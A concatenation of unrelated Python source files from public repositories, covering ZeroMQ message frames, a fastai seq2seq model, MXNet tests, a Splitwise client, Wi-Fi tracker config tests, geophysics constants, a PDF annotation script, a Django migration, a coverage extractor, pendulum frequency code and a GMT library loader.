return self._buffer
@property
def bytes(self):
if self._bytes is None:
self._bytes = self.buffer.tobytes()
return self._bytes
def __len__(self):
return self.buffer.nbytes
def __eq__(self, other):
return self.bytes == _content(other)
def __str__(self):
return self.bytes.decode()
@property
def done(self):
return self.tracker.done()
def __buffer__(self, flags):
return self._buffer
def __copy__(self):
"""Create a shallow copy of the message.
This does not copy the contents of the Frame, just the pointer.
This will increment the 0MQ ref count of the message, but not
the ref count of the Python object. That is only done once when
the Python is first turned into a 0MQ message.
"""
return self.fast_copy()
def fast_copy(self):
"""Fast shallow copy of the Frame.
Does not copy underlying data.
"""
new_msg = Frame()
# This does not copy the contents, but just increases the ref-count
# of the zmq_msg by one.
C.zmq_msg_copy(new_msg.zmq_msg, self.zmq_msg)
# Copy the ref to underlying data
new_msg._data = self._data
new_msg._buffer = self._buffer
# Frame copies share the tracker and tracker_event
new_msg.tracker_event = self.tracker_event
new_msg.tracker = self.tracker
return new_msg
Message = Frame
__all__ = ['Frame', 'Message']
|
nbs/live_streams/Exploring the fastai Callback System/utils.py | sakibsadmanshajib/walkwithfastai.github.io | 104 | 11086604 | # This source code is directly from goralpl's Seq2Seq example, which we worked on debugging together https://github.com/goralpl/learning_fastai/blob/master/seq2seq_fastai_datablocks_custom_model.ipynb
from fastai.text.all import *
__all__ = ['build_dls', 'Seq2Seq']
def build_dls():
valid_jsons = [
{"from_txt":"Hello how are you?","to_txt":"I am doing fine."},
{"from_txt":"Is it going to rain today?","to_txt":"Let me pull up the weather."},
{"from_txt":"How do fastai DataBlocks work?","to_txt":"Not sure, I'm still learning."}
]
df_valid = pd.DataFrame(valid_jsons)
df_valid['is_valid'] = True
test_jsons = [
{"from_txt":"Hello, where is the closest McDonald's?","to_txt":"Let me find you that on Google Maps."},
{"from_txt":"Is it going to snow today?","to_txt":"Let me pull up the weather."},
{"from_txt":"How much coffee is safe to drink?","to_txt":"As much as you need to learn the Fastai Library."}
]
df_train = pd.DataFrame(test_jsons)
df_train['is_valid'] = False
df = pd.concat([df_train,df_valid], ignore_index=True)
logs = DataBlock(
# blocks specify what type of data we are going to be loading.
# In this case both are text files contained in the same df
        # You can specify a tokenizer by passing in a tok variable. Comment the line above and uncomment the ones below.
blocks=(
TextBlock.from_df('from_txt', is_lm=False, tok=SubwordTokenizer(vocab_sz=200)),
TextBlock.from_df('to_txt' , is_lm=False, tok=SubwordTokenizer(vocab_sz=200))),
# The TestBlock tokenization process puts tokenized inputs into a column called text.
# The ColReader for get_x will always reference text, even if the original text inputs
# were in a column with another name in the dataframe.
get_x=ColReader('text'),
get_y=ColReader('text'),
# The dataframe needs to have a is_valid column for this to work.
splitter=ColSplitter()
)
return logs.dataloaders(df, bs=2)
class Encoder(nn.Module):
def __init__(self, input_dim, emb_dim, hid_dim, n_layers, dropout):
super().__init__()
self.hid_dim = hid_dim
self.n_layers = n_layers
self.embedding = nn.Embedding(input_dim, emb_dim)
self.rnn = nn.LSTM(emb_dim, hid_dim, n_layers, dropout = dropout)
self.dropout = nn.Dropout(dropout)
def forward(self, src):
#src = [src len, batch size]
embedded = self.dropout(self.embedding(src))
#embedded = [src len, batch size, emb dim]
outputs, (hidden, cell) = self.rnn(embedded)
#outputs = [src len, batch size, hid dim * n directions]
#hidden = [n layers * n directions, batch size, hid dim]
#cell = [n layers * n directions, batch size, hid dim]
#outputs are always from the top hidden layer
return hidden, cell
class Decoder(nn.Module):
def __init__(self, output_dim, emb_dim, hid_dim, n_layers, dropout):
super().__init__()
self.output_dim = output_dim
self.hid_dim = hid_dim
self.n_layers = n_layers
self.embedding = nn.Embedding(output_dim, emb_dim)
self.rnn = nn.LSTM(emb_dim, hid_dim, n_layers, dropout = dropout)
self.fc_out = nn.Linear(hid_dim, output_dim)
self.dropout = nn.Dropout(dropout)
def forward(self, input, hidden, cell):
#input = [batch size]
#hidden = [n layers * n directions, batch size, hid dim]
#cell = [n layers * n directions, batch size, hid dim]
#n directions in the decoder will both always be 1, therefore:
#hidden = [n layers, batch size, hid dim]
#context = [n layers, batch size, hid dim]
input = input.unsqueeze(0)
#input = [1, batch size]
embedded = self.dropout(self.embedding(input))
#embedded = [1, batch size, emb dim]
output, (hidden, cell) = self.rnn(embedded, (hidden, cell))
#output = [seq len, batch size, hid dim * n directions]
#hidden = [n layers * n directions, batch size, hid dim]
#cell = [n layers * n directions, batch size, hid dim]
#seq len and n directions will always be 1 in the decoder, therefore:
#output = [1, batch size, hid dim]
#hidden = [n layers, batch size, hid dim]
#cell = [n layers, batch size, hid dim]
prediction = self.fc_out(output.squeeze(0))
#prediction = [batch size, output dim]
return prediction, hidden, cell
class Seq2Seq(nn.Module):
def __init__(self, encoder, decoder, device):
super().__init__()
self.encoder = encoder
self.decoder = decoder
self.device = device
assert encoder.hid_dim == decoder.hid_dim, \
"Hidden dimensions of encoder and decoder must be equal!"
assert encoder.n_layers == decoder.n_layers, \
"Encoder and decoder must have equal number of layers!"
def forward(self, src, trg, teacher_forcing_ratio = 0.5):
#src = [src len, batch size]
#trg = [trg len, batch size]
#teacher_forcing_ratio is probability to use teacher forcing
#e.g. if teacher_forcing_ratio is 0.75 we use ground-truth inputs 75% of the time
batch_size = trg.shape[1]
trg_len = trg.shape[0]
trg_vocab_size = self.decoder.output_dim
#tensor to store decoder outputs
outputs = torch.zeros(trg_len, batch_size, trg_vocab_size).to(self.device)
#last hidden state of the encoder is used as the initial hidden state of the decoder
hidden, cell = self.encoder(src)
#first input to the decoder is the <sos> tokens
input = trg[0,:]
for t in range(1, trg_len):
#insert input token embedding, previous hidden and previous cell states
#receive output tensor (predictions) and new hidden and cell states
output, hidden, cell = self.decoder(input, hidden, cell)
#place predictions in a tensor holding predictions for each token
outputs[t] = output
#decide if we are going to use teacher forcing or not
teacher_force = random.random() < teacher_forcing_ratio
#get the highest predicted token from our predictions
top1 = output.argmax(1)
#if teacher forcing, use actual next token as next input
#if not, use predicted token
input = trg[t] if teacher_force else top1
return outputs
|
tests/mxnet/mnist_gluon_model.py | sophiayue1116/sagemaker-debugger | 133 | 11086686 | # Using batch size 4 instead of 1024 decreases runtime from 35 secs to 4 secs.
# Standard Library
import time
# Third Party
import mxnet as mx
import numpy as np
from mxnet import autograd, gluon, init
from mxnet.gluon import nn
from mxnet.gluon.data.vision import datasets, transforms
# First Party
from smdebug import modes
def acc(output, label):
return (output.argmax(axis=1) == label.astype("float32")).mean().asscalar()
def run_mnist_gluon_model(
hook=None,
hybridize=False,
set_modes=False,
register_to_loss_block=False,
num_steps_train=None,
num_steps_eval=None,
make_input_zero=False,
normalize_mean=0.13,
normalize_std=0.31,
save_custom_tensor=False,
):
batch_size = 4
if make_input_zero:
mnist_train = datasets.FashionMNIST(
train=True, transform=lambda data, label: (data.astype(np.float32) * 0, label)
)
normalize_mean = 0.0
else:
mnist_train = datasets.FashionMNIST(train=True)
X, y = mnist_train[0]
("X shape: ", X.shape, "X dtype", X.dtype, "y:", y)
text_labels = [
"t-shirt",
"trouser",
"pullover",
"dress",
"coat",
"sandal",
"shirt",
"sneaker",
"bag",
"ankle boot",
]
X, y = mnist_train[0:10]
transformer = transforms.Compose(
        [transforms.ToTensor(), transforms.Normalize(normalize_mean, normalize_std)]
)
mnist_train = mnist_train.transform_first(transformer)
mnist_valid = gluon.data.vision.FashionMNIST(train=False)
train_data = gluon.data.DataLoader(
mnist_train, batch_size=batch_size, shuffle=True, num_workers=4
)
valid_data = gluon.data.DataLoader(
mnist_valid.transform_first(transformer), batch_size=batch_size, num_workers=4
)
# Create Model in Gluon
net = nn.HybridSequential()
net.add(
nn.Conv2D(channels=6, kernel_size=5, activation="relu"),
nn.MaxPool2D(pool_size=2, strides=2),
nn.Conv2D(channels=16, kernel_size=3, activation="relu"),
nn.MaxPool2D(pool_size=2, strides=2),
nn.Flatten(),
nn.Dense(120, activation="relu"),
nn.Dense(84, activation="relu"),
nn.Dense(10),
)
net.initialize(init=init.Xavier(), ctx=mx.cpu())
if hybridize:
        net.hybridize()
if hook is not None:
# Register the forward Hook
hook.register_hook(net)
softmax_cross_entropy = gluon.loss.SoftmaxCrossEntropyLoss()
trainer = gluon.Trainer(net.collect_params(), "sgd", {"learning_rate": 0.1})
if register_to_loss_block:
hook.register_hook(softmax_cross_entropy)
if set_modes:
train_loss_name = eval_loss_name = "loss_scalar"
train_acc_name = eval_acc_name = "acc"
else:
train_loss_name = "train_loss_scalar"
eval_loss_name = "eval_loss_scalar"
train_acc_name = "train_acc"
eval_acc_name = "loss_acc"
# Start the training.
if save_custom_tensor:
hook.save_tensor("custom_tensor_1", mx.nd.array([1, 2, 3]))
for epoch in range(1):
train_loss, train_acc, valid_acc = 0.0, 0.0, 0.0
tic = time.time()
if set_modes:
hook.set_mode(modes.TRAIN)
i = 0
for data, label in train_data:
if save_custom_tensor:
hook.save_tensor("custom_tensor_2", mx.nd.array([1, 2, 3]))
data = data.as_in_context(mx.cpu(0))
# forward + backward
with autograd.record():
output = net(data)
loss = softmax_cross_entropy(output, label)
loss.backward()
# update parameters
trainer.step(batch_size)
# calculate training metrics
train_loss += loss.mean().asscalar()
train_acc += acc(output, label)
# hook.save_scalar(train_loss_name, train_loss)
# hook.save_scalar(train_acc_name, train_acc)
if save_custom_tensor:
# This tensor will not be added to default collections since
# collections have already been exported
hook.save_tensor("custom_tensor_3", mx.nd.array([1, 2, 3]))
i += 1
if num_steps_train is not None and i >= num_steps_train:
break
# calculate validation accuracy
if set_modes:
hook.set_mode(modes.EVAL)
i = 0
for data, label in valid_data:
data = data.as_in_context(mx.cpu(0))
val_output = net(data)
valid_acc += acc(val_output, label)
loss = softmax_cross_entropy(val_output, label)
# hook.save_tensor('eval_labels', label)
# hook.save_scalar(eval_acc_name, valid_acc)
# hook.save_scalar(eval_loss_name, loss)
i += 1
if num_steps_eval is not None and i >= num_steps_eval:
break
print(
"Epoch %d: loss %.3f, train acc %.3f, test acc %.3f, in %.1f sec"
% (
epoch,
train_loss / len(train_data),
train_acc / len(train_data),
valid_acc / len(valid_data),
time.time() - tic,
)
)
# for tests we have to call cleanup ourselves as destructor won't be called now
# hook._cleanup()
|
splitwise/user.py | aayaffe/splitwise | 105 | 11086702 | from splitwise.picture import Picture
from splitwise.balance import Balance
import splitwise.group as Group
class User(object):
""" Contains basic user data.
Attributes:
id(long, optional): ID of the user
first_name(str, optional): First name of the user
last_name(str, optional): Last name of the user
email(str, optional): Email of the user
registration_status(str, optional): Registration status of the user
picture(:obj:`splitwise.picture.Picture`, optional): Profile picture of the user
"""
def __init__(self, data=None):
"""
Args:
data(:obj:`json`, optional): JSON object representing user object
"""
if data:
self.first_name = data["first_name"]
self.last_name = data["last_name"]
if 'id' in data:
self.id = data["id"]
else:
self.id = None
if 'email' in data:
self.email = data["email"]
else:
self.email = None
if 'registration_status' in data:
self.registration_status = data["registration_status"]
else:
self.registration_status = None
if 'picture' in data:
self.picture = Picture(data["picture"])
else:
self.picture = None
def getId(self):
""" Returns id of the user
Returns:
long: ID of the user
"""
return self.id
def getFirstName(self):
""" Returns first name of the user
Returns:
str: First name of the user
"""
return self.first_name
def getLastName(self):
""" Returns last name of the user
Returns:
str: Last name of the user
"""
return self.last_name
def getEmail(self):
""" Returns email of the user
Returns:
str: Email of the user
"""
return self.email
def getRegistrationStatus(self):
""" Returns registration status of the user
Returns:
str: Registration status of the user
"""
return self.registration_status
def getPicture(self):
""" Returns profile picture of the user
Returns:
:obj:`splitwise.picture.Picture`: Picture of the user
"""
return self.picture
def setFirstName(self, first_name):
""" Sets the first name of the user
        Args:
first_name(str): First name of the user
"""
self.first_name = first_name
def setLastName(self, last_name):
""" Sets the last name of the user
        Args:
last_name(str): Last name of the user
"""
self.last_name = last_name
def setEmail(self, email):
""" Sets the email of the user
        Args:
email(str): Email of the user
"""
self.email = email
def setId(self, id):
""" Sets the id of the user
        Args:
id(long): ID of the user
"""
self.id = id
def __getattr__(self, item):
return None
class CurrentUser(User):
""" Represents the current logged in user.
Inherits: :class:`splitwise.user.User`
Attributes:
default_currency(str, optional): Default Currency
locale(str, optional): Locale
date_format(str, optional): Date format used by the user
default_group_id(long, optional): User's default group id
"""
def __init__(self, data=None):
"""
Args:
data(:obj:`json`, optional): JSON object representing current user object
"""
User.__init__(self, data)
self.default_currency = data["default_currency"]
self.locale = data["locale"]
self.date_format = data["date_format"]
self.default_group_id = data["default_group_id"]
def getDefaultCurrency(self):
""" Returns default currency of the user
Returns:
str: Default currency of the user
"""
return self.default_currency
def getLocale(self):
""" Returns locale of the user
Returns:
str: locale of the user
"""
return self.locale
def getDateFormat(self):
""" Returns Date format used by the user
Returns:
str: Date format used by the user
"""
return self.date_format
def getDefaultGroupId(self):
""" Returns default group id the user
Returns:
long: default group id the user
"""
return self.default_group_id
class Friend(User):
""" Represents a friend user.
Inherits: :class:`splitwise.user.User`
Attributes:
balances(:obj:`list` of :obj:`splitwise.balance.Balance`, optional): List of balances
groups(:obj:`list` of :obj:`splitwise.group.FriendGroup`, optional): List of groups
updated_at(str, optional): ISO 8601 Date time. The last updated date time of user
"""
def __init__(self, data=None):
"""
Args:
data(:obj:`json`, optional): JSON object representing friend user object
"""
User.__init__(self, data)
if data:
if 'updated_at' in data:
self.updated_at = data["updated_at"]
else:
self.updated_at = None
self.balances = []
for balance in data["balance"]:
self.balances.append(Balance(balance))
self.groups = []
if "groups" in data:
for group in data["groups"]:
self.groups.append(Group.FriendGroup(group))
else:
self.groups = None
def getUpdatedAt(self):
""" Returns last updated date of the user
Returns:
str: last updated date of the user
"""
return self.updated_at
def getBalances(self):
""" Returns balances of the user
Returns:
:obj:`list` of :obj:`splitwise.balance.Balance`: List of balances
"""
return self.balances
def getGroups(self):
""" Returns balances of the user
Returns:
:obj:`list` of :obj:`splitwise.group.Group`: List of groups
"""
return self.groups
class ExpenseUser(User):
""" Represents a user in an expense.
Inherits: :class:`splitwise.user.User`
Attributes:
paid_share(str, optional): Paid share for the expense
owed_share(str, optional): Owed share for the expense
net_balance(str, optional): Net balance for the expense
"""
def __init__(self, data=None):
"""
Args:
data(:obj:`json`, optional): JSON object representing user object
"""
if data:
User.__init__(self, data["user"])
self.paid_share = data["paid_share"]
self.owed_share = data["owed_share"]
self.net_balance = data["net_balance"]
def getPaidShare(self):
""" Returns paid share of the user
Returns:
str: paid share of the user
"""
return self.paid_share
def getOwedShare(self):
""" Returns owed share of the user
Returns:
str: owed share of the user
"""
return self.owed_share
def getNetBalance(self):
""" Returns net balance of the user
Returns:
str: net balance of the user
"""
return self.net_balance
def setPaidShare(self, paid_share):
""" Sets the paid share of the user
Args:
            paid_share(str): Paid share of the user
"""
self.paid_share = paid_share
def setOwedShare(self, owed_share):
""" Sets the owed share of the user
Args:
            owed_share(str): Owed share of the user
"""
self.owed_share = owed_share
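# Illustrative usage sketch (not part of the upstream library): build an
# expense participant by hand with the setters defined above. The id and
# share values below are made-up example data.
if __name__ == "__main__":
    payer = ExpenseUser()
    payer.setId(12345)
    payer.setPaidShare("25.0")
    payer.setOwedShare("12.5")
    print(payer.getPaidShare(), payer.getOwedShare())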
|
tests/test_config_management.py | jakuta-tech/trackerjacker | 2,245 | 11086708 | # pylint: disable=C0111, C0413, C0103, E0401
import unittest
import trackerjacker.config_management as cm
class TestParseWatchList(unittest.TestCase):
def test_list_basic(self):
# Test basic MAC-only string
test1 = 'aa:bb:cc:dd:ee:ff'
parsed = cm.parse_command_line_watch_list(test1)
self.assertEqual(parsed, {'aa:bb:cc:dd:ee:ff': {'threshold': None, 'power': None}})
def test_2_macs(self):
test2 = 'aa:bb:cc:dd:ee:ff, 11:22:33:44:55:66'
parsed = cm.parse_command_line_watch_list(test2)
self.assertEqual(parsed, {'aa:bb:cc:dd:ee:ff': {'threshold': None, 'power': None},
'11:22:33:44:55:66': {'threshold': None, 'power': None}})
def test_2_macs_explicit(self):
""" Test 2 devices with explicitly setting threshold and power. """
test3 = 'aa:bb:cc:dd:ee:ff=1000, 11:22:33:44:55:66=-32'
parsed = cm.parse_command_line_watch_list(test3)
self.assertEqual(parsed, {'aa:bb:cc:dd:ee:ff': {'threshold': 1000, 'power': None},
'11:22:33:44:55:66': {'threshold': None, 'power': -32}})
class TestCommandLineBasics(unittest.TestCase):
def test_default_config(self):
# Just making sure I understand how parse_args works
cmd_line_args = cm.get_arg_parser().parse_args([])
self.assertEqual(cmd_line_args.do_map, False)
cmd_line_args = cm.get_arg_parser().parse_args(['--map'])
self.assertEqual(cmd_line_args.do_map, True)
# Test overriding the map_file
cmd_line_args = cm.get_arg_parser().parse_args([])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['map_file'], 'wifi_map.yaml')
def test_override_config(self):
cmd_line_args = cm.get_arg_parser().parse_args(['--map-file', 'my_network.yaml'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['map_file'], 'my_network.yaml')
def test_config_macs_to_watch_default_threshold_to_1(self):
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 1,
'power': None,}})
def test_config_macs_to_watch_explicit_threshold(self):
""" Test setting an explicit threshold. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21=100'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 100,
'power': None}})
def test_config_macs_to_watch_explicit_threshold_multiple(self):
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21=100,aa:bb:cc:dd:ee:ff'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 100,
'power': None},
'aa:bb:cc:dd:ee:ff': {'threshold': 1,
'power': None}})
def test_config_macs_to_watch_power_and_threshold(self):
""" Test setting power and threshold. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21=100,aa:bb:cc:dd:ee:ff=-50'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 100,
'power': None},
'aa:bb:cc:dd:ee:ff': {'threshold': None,
'power': -50}})
def test_config_macs_to_watch_general_threshold(self):
""" Test that general threshold is used if no explicit specified. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21,aa:bb:cc:dd:ee:ff',
'--threshold', '1337'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 1337,
'power': None},
'aa:bb:cc:dd:ee:ff': {'threshold': 1337,
'power': None}})
class TestCommandLineGeneralPower(unittest.TestCase):
def test_config_macs_to_watch_power(self):
""" Test that general threshold is used if no explicit specified. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21,aa:bb:cc:dd:ee:ff',
'--power', '-42'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': None,
'power': -42},
'aa:bb:cc:dd:ee:ff': {'threshold': None,
'power': -42}})
class TestCommandLinePower(unittest.TestCase):
def test_config_macs_to_watch_mixed_override(self):
""" Test that we can have explicitly-set threshold and still get general power. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21=123,aa:bb:cc:dd:ee:ff',
'--power', '-42'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 123,
'power': None},
'aa:bb:cc:dd:ee:ff': {'threshold': None,
'power': -42}})
class TestCommandLineExplicitPowerGeneralThreshold(unittest.TestCase):
def test_config_macs_to_watch_mixed_override_reverse(self):
""" Test that we can have explicitly-set power and still get general threshold. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-m', '7C:70:BC:78:70:21=-22,11:bb:cc:dd:ee:ff',
'--threshold', '1024'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['devices_to_watch'], {'7C:70:BC:78:70:21': {'threshold': None,
'power': -22},
'11:bb:cc:dd:ee:ff': {'threshold': 1024,
'power': None}})
class TestCommandLineApsToWatch(unittest.TestCase):
def test_config_aps_to_watch(self):
""" Test setting explicit threshold and power, and test ssid. """
cmd_line_args = cm.get_arg_parser().parse_args(['--track', '-a', '7C:70:BC:78:70:21=100,my_network'])
config = cm.build_config(cmd_line_args)
self.assertEqual(config['aps_to_watch'], {'7C:70:BC:78:70:21': {'threshold': 100,
'power': None},
'my_network': {'threshold': 1,
'power': None}})
if __name__ == '__main__':
unittest.main()
|
pyshtools/constants/__init__.py | mjc87/SHTOOLS | 251 | 11086742 | """
pyshtools constants.
This subpackage defines several constants used in analyzing gravity,
topography, and magnetic field data of the terrestrial planets. The constants
are organized by planet, and each object is an astropy Constant that possesses
the attributes name, value, unit, uncertainty, and reference. These constants
can be used in arithmetic operations with objects of the astropy class
Quantity.
Examples
Calculate the gravitational acceleration on the surface of Mars and
then convert this to mGal:
>>> Mars.gm / Mars.r**2
<Quantity 3.7278663 m / s2>
>>> (Mars.gm / Mars.r**2).to_value('mGal')
372786.6303857397
Inspect a constant using the print function:
>>> print(G)
Name = Gravitational constant
Value = 6.6743e-11
Uncertainty = 1.5e-15
Unit = m3 / (kg s2)
Reference = CODATA 2018
"""
try:
from astropy.constants import Constant
from astropy.units.quantity import Quantity
except ImportError:
raise ImportError('To use the pyshtools constant subpackage, you must '
'install astropy.')
# == Fundamental constants ==
from astropy.constants import G
from astropy.constants import mu0
from astropy.constants import codata
# == Constants organized by planet ===
from . import Mercury
from . import Venus
from . import Earth
from . import Moon
from . import Mars
# === Define __all__ ===
__all__ = ['Constant', 'Quantity', 'G', 'mu0', 'codata', 'Mercury', 'Venus',
'Earth', 'Moon', 'Mars']
|
recipes/Python/580733_Reverse_sequence_annotations_PDF/recipe-580733.py | tdiprima/code | 2,023 | 11086754 | <reponame>tdiprima/code
import fitz
doc = fitz.open("some.pdf") # open pdf
n = 0 # page number to work on (0-based; adjust as needed)
page = doc[n] # open the page
rtab = [] # store all rectangles here
annot = page.firstAnnot # read first annotation
while annot:
rtab.append(annot.rect) # store rectangle
annot = annot.next # read next annot
annot = page.firstAnnot # cycle thru annots again
for rect in reversed(rtab):
annot.setRect(rect) # give it a new place
annot = annot.next
doc.save("some-reversed.pdf") # save PDF with reversed annotations
|
corehq/apps/users/migrations/0020_user_staging_pk_to_bigint.py | dimagilg/commcare-hq | 471 | 11086771 | # Generated by Django 2.2.13 on 2020-07-27 11:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0019_editreportspermissions'),
]
operations = [
migrations.AlterField(
model_name='userreportingmetadatastaging',
name='id',
field=models.BigAutoField(primary_key=True, serialize=False),
),
]
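# For reference only (illustrative, backend-dependent): on PostgreSQL this
# migration roughly corresponds to
#   ALTER TABLE users_userreportingmetadatastaging ALTER COLUMN id TYPE bigint;
# (table name assumed from the app/model names), with Django also updating
# the owned id sequence. The exact SQL can be inspected with
# `manage.py sqlmigrate users 0020`.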
|
build/scripts/extract_jacoco_report.py | HeyLey/catboost | 6,989 | 11086784 | <filename>build/scripts/extract_jacoco_report.py
import argparse
import os
import re
import tarfile
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--archive', action='store')
parser.add_argument('--source-re', action='store')
parser.add_argument('--destination', action='store')
args = parser.parse_args()
with tarfile.open(args.archive) as tf:
open(args.destination, 'wb').close()
extract_list = []
matcher = re.compile(args.source_re)
temp_dir = os.path.join(os.path.dirname(args.destination), 'temp_profiles')
if not os.path.exists(temp_dir):
os.makedirs(temp_dir)
for f in [i for i in tf if matcher.match(i.name)]:
tf.extract(f, path=temp_dir)
for directory, _, srcs in os.walk(temp_dir):
for f in srcs:
with open(args.destination, 'ab') as dst:
                    with open(os.path.join(directory, f), 'rb') as src:
dst.write(src.read())
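# Example invocation (illustrative paths and regex only -- adjust them to the
# layout of your coverage archive):
#   python extract_jacoco_report.py \
#       --archive coverage.tar --source-re '.*\.exec$' --destination merged.exec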
|
postprocessing/CalculateFrequency.py | mathreader/DeepKoopman | 199 | 11086795 | <gh_stars>100-1000
import numpy as np
from scipy.special import factorial2
from scipy.special import factorial
def kfn(theta0):
return np.sin(np.float64(theta0) / 2)
def periodTerm(n, k):
numerator = np.float64((factorial2(2 * n - 1)) ** 2)
denominator = np.float64((2 ** n) * factorial(n) * factorial2(2 * n))
return (numerator / denominator) * (k ** (2 * n)) * (2 * np.pi)
def periodTermNextStep(n, k, prevTerm):
nextTerm = ((2 * n - 1) ** 2) * prevTerm / (4 * n ** 2) * k ** 2
return nextTerm
def periodPendulum(theta0, tol, maxN, printFlag=0):
periodApprox = 2 * np.pi # n = 0 term
k = kfn(theta0)
for n in (np.arange(maxN) + 1): # n = 1, 2, ..., maxN
if n < 3:
nextTerm = periodTerm(n, k)
else:
# nextTermOldFormula = periodTerm(n, k)
nextTerm = periodTermNextStep(n, k, prevTerm)
# if (np.abs(nextTermOldFormula - nextTerm) > 10**(-10)):
# print "discrepancy at n = %f, k = %f: prev. formula said nextTerm = %f, new formula says nextTerm = %f" % (n, k, nextTermOldFormula, nextTerm)
if nextTerm < 0:
print("nextTerm < 0: %f at n = %f, k = %f" % (nextTerm, n, k))
if nextTerm > tol: # nextTerm gives sense of error (really, lower bound, since all terms are non-neg)
periodApprox += nextTerm
else:
if printFlag:
print("reached tol (lower bound on error) after n = %d" % (n - 1))
break
prevTerm = nextTerm.copy()
return periodApprox
def FindTheta0(theta, thetadot):
# print "find theta0 for theta = %f and thetadot = %f" % (theta, thetadot)
potential = (1.0 / 2.0) * (thetadot ** 2) - np.cos(theta) + 1 # H
# E = 1 - np.cos(theta0)
# domain for real #s for arrcos is [-1,1]
# so want 1-potential in [-1, 1]
# so want potential in [0, 2]
if ((potential < 0) or (potential > 2)):
# TODO: do something smarter here
potential = 0
theta0 = np.arccos(1 - potential)
return theta0
# def f(t, x):
# return [x[1], -np.sin(x[0])]
def FindOmega(point, tol=10 ** (-7), maxTerms=100):
theta0 = FindTheta0(point[0], point[1])
period = periodPendulum(theta0, tol, maxTerms)
omega = (2 * np.pi) / period
# eigenval = np.exp(omega*1j*deltat)
return omega
def AddFrequency(prefix, suffix, tol=10 ** (-7), maxTerms=100):
fname = prefix + suffix
print("loading %s" % fname)
data = np.loadtxt(fname, delimiter=',')
# each row is an example, we add extra column
data_freq = np.zeros((data.shape[0], data.shape[1] + 1), dtype=np.float32)
data_freq[:, 0:2] = data.copy()
for j in range(data.shape[0]):
data_freq[j, 2] = FindOmega(data[j, 0:2])
newfname = prefix + 'Freq' + suffix
print("saving %s" % newfname)
np.savetxt(newfname, data_freq, delimiter=',')
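# Small illustrative check (not part of the original script): for a small
# release angle the period approaches 2*pi, so FindOmega should be close to 1
# (dimensionless units with g = L = 1); larger amplitudes give lower values.
if __name__ == "__main__":
    print(FindOmega([0.1, 0.0]))  # ~0.9994
    print(FindOmega([2.0, 0.0]))  # noticeably below 1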
|
pygmt/clib/loading.py | jbusecke/pygmt | 326 | 11086798 | """
Utility functions to load libgmt as ctypes.CDLL.
The path to the shared library can be found automatically by ctypes or set
through the GMT_LIBRARY_PATH environment variable.
"""
import ctypes
import os
import subprocess as sp
import sys
from ctypes.util import find_library
from pathlib import Path
from pygmt.exceptions import GMTCLibError, GMTCLibNotFoundError, GMTOSError
def load_libgmt(lib_fullnames=None):
"""
Find and load ``libgmt`` as a :py:class:`ctypes.CDLL`.
Will look for the GMT shared library in the directories determined by
clib_full_names().
Parameters
----------
lib_fullnames : list of str or None
List of possible full names of GMT's shared library. If ``None``, will
default to ``clib_full_names()``.
Returns
-------
:py:class:`ctypes.CDLL` object
The loaded shared library.
Raises
------
GMTCLibNotFoundError
If there was any problem loading the library (couldn't find it or
couldn't access the functions).
"""
if lib_fullnames is None:
lib_fullnames = clib_full_names()
error = True
error_msg = []
failing_libs = []
for libname in lib_fullnames:
try:
if libname not in failing_libs: # skip the lib if it's known to fail
libgmt = ctypes.CDLL(libname)
check_libgmt(libgmt)
error = False
break
except (OSError, GMTCLibError) as err:
error_msg.append(f"Error loading GMT shared library at '{libname}'.\n{err}")
failing_libs.append(libname)
if error:
raise GMTCLibNotFoundError("\n".join(error_msg))
return libgmt
def clib_names(os_name):
"""
Return the name of GMT's shared library for the current OS.
Parameters
----------
os_name : str
The operating system name as given by ``sys.platform``.
Returns
-------
libnames : list of str
List of possible names of GMT's shared library.
"""
if os_name.startswith(("linux", "freebsd")):
libnames = ["libgmt.so"]
elif os_name == "darwin": # Darwin is macOS
libnames = ["libgmt.dylib"]
elif os_name == "win32":
libnames = ["gmt.dll", "gmt_w64.dll", "gmt_w32.dll"]
else:
raise GMTOSError(f"Operating system '{os_name}' not supported.")
return libnames
def clib_full_names(env=None):
"""
Return the full path of GMT's shared library for the current OS.
Parameters
----------
env : dict or None
A dictionary containing the environment variables. If ``None``, will
default to ``os.environ``.
Yields
------
lib_fullnames: list of str
List of possible full names of GMT's shared library.
"""
if env is None:
env = os.environ
libnames = clib_names(os_name=sys.platform) # e.g. libgmt.so, libgmt.dylib, gmt.dll
# Search for the library in different ways, sorted by priority.
# 1. Search for the library in GMT_LIBRARY_PATH if defined.
libpath = env.get("GMT_LIBRARY_PATH", "") # e.g. $HOME/miniconda/envs/pygmt/lib
if libpath:
for libname in libnames:
libfullpath = Path(libpath) / libname
if libfullpath.exists():
yield str(libfullpath)
# 2. Search for the library returned by command "gmt --show-library"
# Use `str(Path(realpath))` to avoid mixture of separators "\\" and "/"
try:
libfullpath = Path(
sp.check_output(["gmt", "--show-library"], encoding="utf-8").rstrip("\n")
